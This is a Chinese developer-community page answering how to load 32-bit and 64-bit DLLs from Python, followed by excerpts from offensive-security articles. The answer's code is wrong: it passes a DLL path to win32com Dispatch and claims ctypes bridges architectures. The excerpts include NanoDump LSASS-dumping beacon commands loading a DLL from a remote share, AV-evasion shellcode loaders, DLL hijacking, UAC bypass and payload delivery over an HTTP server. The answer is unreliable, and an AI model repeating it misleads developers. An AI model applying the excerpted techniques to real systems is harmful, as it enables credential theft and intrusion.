文章/答案/技术大牛

发布

在64位Python进程中加载32位和64位dll

基础概念

在64位Python进程中加载32位和64位DLL涉及到的是不同架构的兼容性问题。64位进程无法直接加载32位DLL，因为它们的内存管理和调用约定不同。同样，32位进程也无法加载64位DLL。

类型

32位DLL：只能在32位进程中运行。
64位DLL：只能在64位进程中运行。

应用场景

32位DLL：适用于需要与旧的32位系统或应用程序集成的场景。
64位DLL：适用于需要高性能和大内存支持的应用场景。

问题与解决方法

加载32位DLL

问题：在64位Python进程中加载32位DLL会失败。

原因：64位进程无法直接加载32位DLL，因为它们的内存管理和调用约定不同。

解决方法：

使用32位Python解释器：安装并使用32位的Python解释器来运行你的代码。
使用兼容层：例如，使用pywin32库的win32com模块来加载32位DLL。

import win32com.client

# 示例：加载32位DLL
dll_path = "path_to_32bit_dll.dll"
client = win32com.client.Dispatch(dll_path)

加载64位DLL

问题：在32位Python进程中加载64位DLL会失败。

原因：32位进程无法直接加载64位DLL，因为它们的内存管理和调用约定不同。

解决方法：

使用64位Python解释器：安装并使用64位的Python解释器来运行你的代码。
使用兼容层：例如，使用ctypes库来加载64位DLL。

import ctypes

# 示例：加载64位DLL
dll_path = "path_to_64bit_dll.dll"
dll = ctypes.CDLL(dll_path)

参考链接

通过以上方法，你可以根据不同的需求和环境选择合适的解决方案来加载32位或64位DLL。

相关·内容

python dll注入网络_dll注入

pip3 install 二、为何要有dll 由于进程的地址空间是独立的(保护模式)，当多个进程共享相同的库时，每个库都在硬盘和进程彼此的内存存放一份的话，对于早期的计算机来说，无疑是一种极大的浪费...详细如下：在Windows操作系统中，运行的每一个进程都生活在自己的程序空间中(保护模式)，每一个进程都认为自己拥有整个机器的控制权，每个进程都认为自己拥有计算机的整个内存空间，这些假象都是操作系统创造的...所谓的dll注入正是是让进程A强行加载程序B给定的a.dll，并执行程序B给定的a.dll里面的代码，从而达到A进程控制B进程的目的注意，程序B所给定的a.dll原先并不会被程序A主动加载，但是当程序...函数对应用程序挂钩(HOOK)迫使程序加载dll； 4.替换应用程序一定会使用的dll； 5.把dll作为调试器来注入； 6.用CreateProcess对子进程注入dll 7.修改被注入进程的exe的导入地址表...ps：杀毒软件常用钩子来进行处理六、使用SetWindowsHookEx函数对应用程序挂钩(HOOK)迫使程序加载dll ctypes是Python的外部函数库，从Python2.5开始引入。

2.1K3 0

MemTracer：一款功能强大的内存扫描工具

关于MemTracer MemTracer是一款功能强大的内存扫描工具，该工具提供了一种实时内存分析功能，可以帮助广大研究人员或数字取证专家扫描、发现和分析隐藏在内存中的不易被发现的恶意行为或网络攻击痕迹...MemTracer基于纯Python语言开发，旨在检测内存中原生.Net框架动态链接库DLL的反射型加载行为。...随后，该工具便会将被识别为DLL模块的可疑内存区域转储以进行进一步的分析和调查。...除此之外，该工具还提供了下列功能选项： 1、转出存在安全问题的进程信息； 2、将受损进程的信息转储到一个JSON文件中，例如进程名称、进程ID、进程路径、进程大小和基地址等信息； 3、通过名称搜索特定的已加载模块...r, --reflectiveScan：扫描反射型DLL加载行为； -m MODULE, --module MODULE：搜索和扫描指定的已加载DLL；需要注意的是，如果你想要使用MemTracer扫描所有的进程

6921 0

DLL攻击漫谈

DLL主要用于在系统上的应用程序和进程之间共享此内容，以便在为Windows创建应用程序时为程序员提供高度的灵活性。 DLL以相同的访问权限在调用过程的内存中执行。...DLL搜索顺序简介在整个日常工作中，我们将大量流程加载到我们的系统中。...使用Windows操作系统时，进程加载算法的关键步骤包括将动态链接库（DLL）加载到内存中，以利用其功能并满足其进程与DLL之间的依赖关系。每当启动进程时，都会发生此操作。...第二步：查找DLL和利用在查找这些DLL时，得出的结论是Riched32.DLL是非本地DLL，因此，注册表中没有该DLL的默认搜索路径。但是如果我们正确配置它，系统最终也会加载它。...通过使用PowerShell和DLL代码中包含的NetCat的反向Shell 并尝试与kali上的侦听器联系，然后使用PowerShell打开shell 我们可以看到执行劫持的进程后，将加载DLL并打开

1.3K1 0

如何使用NanoDump导出LSASS进程数据

关于NanoDump NanoDump是一款功能强大的MiniDump转储文件提取工具，在该工具的帮助下，广大研究人员可以轻松转储LSASS进程中的MiniDump数据。...3版本，即pypykatz来获取转储文件中的敏感信息： python3 -m pypykatz lsa minidump 以SSP加载NanoDump 我们可以在LSASS中以SSP...当转储完成后，DllMain将返回FALSE来控制LSASS卸载NanoDump DLL。如需修改转储路径和签名配置，可以直接修改entry.c中的NanoDump函数。...--fork --write C:\lsass.dmp 使用MalSecLogon在一个记事本进程中获取LSASS句柄，然后拷贝句柄以访问LSASS，并读取转储信息： beacon> nanodump...\Temp\[RANDOM].dll 在LSASS中以SSP加载NanoDump（远程）： beacon> load_ssp \\10.10.10.10\openShare\nanodump_ssp.x64

1.6K1 0

如何使用LightsOut生成经过混淆处理的DLL

该工具专为红队研究人员设计，生成的DLL可以在研究人员尝试绕过反病毒产品时禁用AMSI和ETW，从而更好地测试目标系统的安全性。...该工具可以随机化DLL中所有的WinAPI函数使用、XOR编码字符串和基础的沙箱检测，并使用了Mingw-w64将经过混淆处理的C代码编译为DLL文件，然后再加载到任何有AMSI或ETW的进程中，例如PowerShell...操作系统上运行，且需要安装并配置好下列组件： Python 3 Mingw-w64 工具下载由于该工具基于Python 3开发，因此我们首先需要在本地设备上安装并配置好Python 3.x环境。...我们可以直接将工具输出的DLL文件发送到目标系统中，然后通过多种方法将其加载进PowerShell中。...比如说，我们可以通过LoadLibrary和P/Invoke实现加载：或者更简单地操作，直接将PowerShell拷贝到一个任意位置，然后实现DLL测加载：许可证协议本项目的开发与发布遵循GPL-

1291 0

sRDI – Shellcode 反射 DLL 注入

随着 Windows API 的成长和普及，人们在 DLL 中找到了避风港。C 代码和交叉兼容性非常吸引人，但是如果您希望您的 DLL 在另一个进程中执行怎么办？...Windows 操作系统已经知道如何加载 PE 文件，所以人们很好地询问和 DLL Injection 出生于。这涉及在远程进程中启动一个线程以从 WinAPI 调用“LoadLibrary()”。...这将从磁盘读取（恶意）DLL 并将其加载到目标进程中。因此，您编写了一些很酷的恶意软件，将其保存为 DLL，将其放入磁盘，然后重新生成到其他进程中。太棒了！......嗯，不是真的。...构建引导原语后，我们实现了转换为不同语言（C、PowerShell、C# 和 Python）的过程。这允许我们将新的 shellcode 和一个 DLL 与我们需要的任何其他工具中的引导代码挂钩。...用例 #1 – 隐秘的持久性使用服务器端 Python 代码 (sRDI) 将 RAT 转换为 shellcode 将 shellcode 写入注册表设置计划任务以执行基本加载程序 DLL Loader

1.9K0 0

python调用dll文件接口

转载在Python中某些时候需要C做效率上的补充，在实际应用中，需要做部分数据的交互。...cdecl（这里强调调用约定是因为，stdcall调用约定和cdecl调用约定声明的导出函数，在使用python加载时使用的加载函数是不同的，后面会有说明）调用约定的导出函数Add。...像printf这样的函数，事先不知道需要的栈大小，需要用cdecl来处理所以需要使用cdecl来调用 2、调用dll中的方法在1中加载dll的时候会返回一个DLL对象（假设名字叫Objdll...在python中要实现c语言中的结构，需要用到类。 4、DLL中的函数返回一个指针。... 5、处理C中的结构体类型为什么把这个单独提出来说呢，因为这个是最麻烦也是最复杂的，在python里面申明一个类似c的结构体，要用到类，并且这个类必须继承自Structure。

5.6K4 0

五种免杀bypass火绒360姿势横向测评：哪款更适合你？

/Desktop/1.c （二）通过远程线程注入加载payload 通过VS2019对payload进行处理：编译生成Project1.exe，将其传入装有360和火绒的Windows靶机进行免杀测试...（三）检测免杀在Kali上开启msf监听在靶机上运行Project1.exe，Kali机器获取到Session，并且360和火绒均未报毒二、DLL注入（一）通过DLL注入加载Payload...通过VS2019编译DLL文件，该DLL文件将加载之前用MSF产生的payload，经regsvr32测试可以使用再通过VS2019编译DLL加载器，该加载器将会把指定DLL（Dll1.dll）加载到指定进程...（二）检测免杀在Kali机器上开启msf监听开启calc.exe，获取其PID信息运行Project1.exe，Kali机器获取到Session，且火绒和360未报毒三、Shellcode...加载器（一）python运行加载器将python脚本中的shellcode部分改为msf生成的payload （二）检测免杀 Kali机器开启监听在Windows学员机环境下运行python加载器

3.6K5 0

免杀杂谈

在vs中操作。...其原理如下： APC注册：在目标进程中创建一个用户模式线程，并将其关联到一个合法的可执行函数或API回调函数。...1.加载不存在的dll 然后这里找到一个需要用到loadlibrary这个api的dll，这里找有个api的原因是因为如果该dll的调用栈中存在有 loadlibrary(Ex) ,说明这个dll被进程所动态加载的...如果这种利用场景下，伪造的dll文件不需要存在任何导出函数即可被成功加载，即使加载后进程内部出错，也是在dll被加载成功加载之后的事情。...2.加载存在的dll 1.找到目标进程加载了哪些dll 2.找一个dll 假设我们选取amsi.dll 我们看到这个导入目录中存在LoadLibraryExW 然后再去找到它的函数有什么，下一次尝试写入

3911 0

DLL injection--LOLBIN

国外安全研究员发现了2个具有微软签名的二进制文件可以进行 DLL 注入。...分别为： inject_dll_amd64.exe inject_dll_x86.exe 文件位于： C:\Program Files(x86)\Microsoft Visual Studio\2019...\Community\Common7\IDE\Extensions\Microsoft\Python\Core\debugpy\_vendored\pydevd\pydevd_attach_to_process...to\dll\mod.dll 使用环境：可以用来绕过一些EDR和安全终端产品进行Dll注入例如：很明显我们的DLl注入了目标进程中同时cobaltstrike也上线了绕过Cylance...注入进程可以看到目标进程加载了我们的Dll 同时在coablststrike中可以上线 TIPS：可以在投放木马时作为某个阶段就行投放，配合某些手法我们可以不用DLL落地。

6062 0

红队培训班作业 | 五种免杀bypass火绒360姿势横向测评：哪款更适合你？

（三）检测免杀在Kali上开启msf监听在靶机上运行Project1.exe，Kali机器获取到Session，并且360和火绒均未报毒二、DLL注入（一）通过DLL注入加载Payload...通过VS2019编译DLL文件，该DLL文件将加载之前用MSF产生的payload，经regsvr32测试可以使用再通过VS2019编译DLL加载器，该加载器将会把指定DLL（Dll1.dll）...加载到指定进程（二）检测免杀在Kali机器上开启msf监听开启calc.exe，获取其PID信息运行Project1.exe，Kali机器获取到Session，且火绒和360未报毒三...、Shellcode加载器（一）python运行加载器将python脚本中的shellcode部分改为msf生成的payload （二）检测免杀 Kali机器开启监听在Windows学员机环境下运行...python加载器，kali获取到session，且360和火绒均未报毒，第一次失败是由于配置shellcode时多打了一个字符导致出错。

1.6K4 0

Donut - 将 .NET 程序集作为 Shellcode 注入

装配.加载虽然反射 API 非常通用并且可以在许多不同的方式中使用，但它只能在当前进程中运行代码。不支持在远程进程中运行有效负载。...反射 DLL 被注入子进程以加载 .NET 运行时。反射 DLL 加载中间 .NET 程序集以处理错误并提高有效负载的稳定性。中间 .NET 程序集从子进程内的内存中加载您的 .NET 程序集。...在通过 CLR 加载程序集后，原始引用将从内存中删除以阻止内存扫描器。程序集被加载到一个新的应用程序域中，以允许在一次性 AppDomains 中运行程序集。...为生成有效负载提供了 Windows EXE 和 Python（计划用于 v1.0 的 Python）脚本。命令行语法如下所述。...与 CLR 关联的 DLL 均以“msco”开头，例如“mscorlib.dll”和“mscoree.dll”。因此，我们观察它们的加载，然后检查加载它们的程序是否是有效的 .NET 程序集。

2.2K0 0

BypassUAC

常见的利用方式有： DLL注入（RDI技术），一般注入到常驻内存的可信进程，如：explorer DLL劫持，常和注册表配合使用达到劫持目的伪装进程PEB绕过UAC 上面在利用COM接口的ShellExec...除了通过上面的方式在OleView中手动去找，还可以通过UACMe项目提供的Yuubari工具快速查看系统UAC设定信息以及所有可以利用的程序和COM组件，使用方法如下：使用VS2019加载Yuubari...DLL 形式如何使用？ dll可以使用系统可信进程rundll32.exe进行加载，这样也不需要调用MarquradePEB。...进程加载的cmlua.dll文件并不是system32目录，而是SysWOW64的，SysWOW64放的是32位系统文件，程序为什么去加载的是32位的，使用CFF看一下生成的dll文件类型： ?...值得研究的C2推荐 Python Empire，官方已经不维护了不推荐用，但是值得研究借鉴 Pupy，很适合玩Python的研究 SILENTTRINITY，利用的.net DLR方式实现，动态加载不落地

2.3K3 0

基于Windows白名单执行Payload上线Metasploit - 渗透红队笔记

文件，它的作用是执行DLL文件中的内部函数,功能就是以命令行的方式调用动态链接程序库。...然而PsExec默认在Windows系统上没安装。...紧接着Kali开启一个HTTP服务用于远程加载： python -m SimpleHTTPServer 9000 ?...然后使用Python开启一个HTTP服务用于远程加载Payload： python -m SimpleHTTPServer 9000 ?....dll上传到目标服务器，运行命令加载上线： cmstp.exe /s 10000.inf ?

2.5K2 0

Chimera：一款带有EDR规避功能的自动化DLL侧加载工具

关于Chimera Chimera是一款带有EDR规避功能的自动化DLL侧加载工具，在该工具的帮助下，广大研究人员可以在渗透测试过程中，绕过EDR的检测并实现自动化DLL侧加载。...虽然DLL侧加载可以用于合法目的，例如加载程序运行所需的库，但也可以用于恶意目的。而攻击者通常可以通过利用用于加载DLL的合法应用程序中的漏洞，从而使用DLL侧加载技术在目标系统上执行任意代码。...除此之外，该工具还使用了SysWhispers2的动态系统调用和一个修改版本的汇编代码库来规避EDR的搜索模式，该工具经过测试，证明在绕过EDR/AV产品和在目标系统上执行任意代码方面是有效的。...工具安装由于该工具基于Python 3开发，因此我们首先需要在本地设备上安装并配置好Python 3环境。...我们可以创建userenv.dll（Microsoft Teams缺少的DLL），并将其插入到指定的目录路径中： %USERPROFILE%/Appdata/local/Microsoft/Teams/

6424 0

技术研究-从零开始学习DLL劫持

DLL劫持 DLL简介在Windows中，许多应用程序并不是一个完整的可执行文件，它们被分割成一些相对独立的动态链接库，即DLL文件，放置于系统中。...DLL加载顺序如果程序需要加载一个相对路径的dll文件，它将从当前目录下尝试查找，如果找不到，则按照如下顺序寻找： windows xp sp2之前 Windows查找DLL的目录以及对应的顺序：进程对应的应用程序所在目录...\dyy\AppData\Local\Programs\Python\Python38\Scripts\oci.dll 使用cs生成恶意dll，重命名为oci.dll后放置到该目录下手动挖掘 Process...://DLL首次被加载到内存时运行 case DLL_PROCESS_DETACH://DLL销毁时运行 case DLL_THREAD_ATTACH://DLL线程加载时运行...即时调用函数，可以在处理加载DLL时，调用具体函数的时候行为可控，高度自定义触发点,也称用来hook某些函数，获取到参数值我的博客即将同步至腾讯云开发者社区，邀请大家一同入驻：https:

1.1K1 0

白加黑保姆教程通杀主流杀软

注册表项里的 DLL 列表在应用程序运行后就已经加入到了内核空间中，多个进程公用这些模块，必须具有非常高的权限才能修改。...这种方式的优点是，可以在需要调用函数时才加载目标 DLLB....系统启动或终止进程或线程的时候，它会使用进程的第一个线程为每个加载的DLL来调用入口点函数。...: // 当DLL被进程加载时执行，每个新进程只初始化一次。...也就是说创建线程申请内存加载shellcode需要在导出函数里面操作，不能再dllmain里面直接操作，需要找到第一个执行的函数就能行，但是麻烦，我们可以可以新定义一个函数来申请内存，加载到内存中，在dllmain

6481 0

DLL劫持之IAT类型

: 这个标志用于告诉系统将DLL映射到调用进程的地址空间中，但是不调用DllMain并且不加载依赖Dll（只映射自己本身）。...LOAD_LIBRARY_SEARCH_USER_DIRS : 搜索路径的使用使用AddDllDirectory和SetDllDirectory设置的路径（保护Dll自己和依赖Dll）。...LOAD_LIBRARY_SEARCH_SYSTEM32 : 从%windows%\system32加载Dll和其依赖项。...LOAD_LIBRARY_SEARCH_APPLICATION_DIR : 应用程序安装路径搜索Dll和其依赖项。...(&LdrpLoaderLock) 在第4步运行LdrpRunInitializeRoutines其实就是调用DllMain，也就是说加载dll首先会加载锁，再调用DllMain 挖掘针对非LoadLibrary

6811 0

弹性边界：如何利用环境变量进行提权

以下为基于环境变量扩展的攻击场景场景1：”DLL注入” 假设：如果通过一个扩展了的环境字符串加载DLL文件，攻击者通过改变环境变量可获得一个进程来加载该文件，但需在创建之前提供给这个进程。...换句话说，任何一个在攻击者控制下的进程，攻击者都可以对它进行环境设置。可能性：加载的DLL文件，不管是被复制，修改，完全替换，对于加载它的进程来说权限都是一样的。...DLL加载到各种进程中。...这份清单是应该是在系统安全性和用户友好体验之间提出的一个合理折中方案。攻击者可以利用这种妥协，使操作系统在加载不受信任的DLL时运行这些特殊的可执行文件，从而绕过安全机制运行具有提升特权的DLL。...结论 Windows中的环境变量扩展允许攻击者在攻击之前收集系统的相关信息，并最终通过运行单个用户级命令或者更改一个注册表键值来对系统进行完全和持久的控制。

1.4K7 0

RunAsPPL的对抗

在值名称框中，键入RunAsPPL。 9. 在值类型框中，单击REG_DWORD。 10. 在数值数据框中，键入00000001。 11. 单击“确定”。...- 2.自带驱动程序bypass 这个bypass的点就是加载一个官方的易受攻击的驱动程序，可以利用它在内核中运行任意代码，在我们加载官方驱动程序后，可以继续利用它来加载我们自己的未签名的驱动程序，这种技术不仅在此对抗...我们要知道，当一个进程被创建时，它首先会通过“已知 DLL”列表（为了提高效率）去搜索dll，然后在应用程序的目录，系统目录等等......在这个搜索顺序中，“已知 DLL”是最高优先级的。...“已知 DLL” 是 Windows 应用程序最常加载的 DLL，它们被预加载到内存中（即它们被缓存），可以通过查看\KnownDlls对象管理器中目录的内容来查看缓存的dll 关键点来了，在正常的程序启动时...，程序加载dll，仅在映射文件时进行验证，即创建节的时候，相比之下PP进程是会进行dll的数字签名验证的过后才能加载，而PPL又和正常程序一样一样，这就是漏洞利用点，因为 DLL 的数字签名仅在映射文件时进行验证

1.7K2 0

点击加载更多

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云

在64位Python进程中加载32位和64位dll

基础概念

相关优势

类型

应用场景

问题与解决方法

加载32位DLL

加载64位DLL

参考链接

社区

活动

圈层

关于

腾讯云开发者

热门产品

热门推荐

更多推荐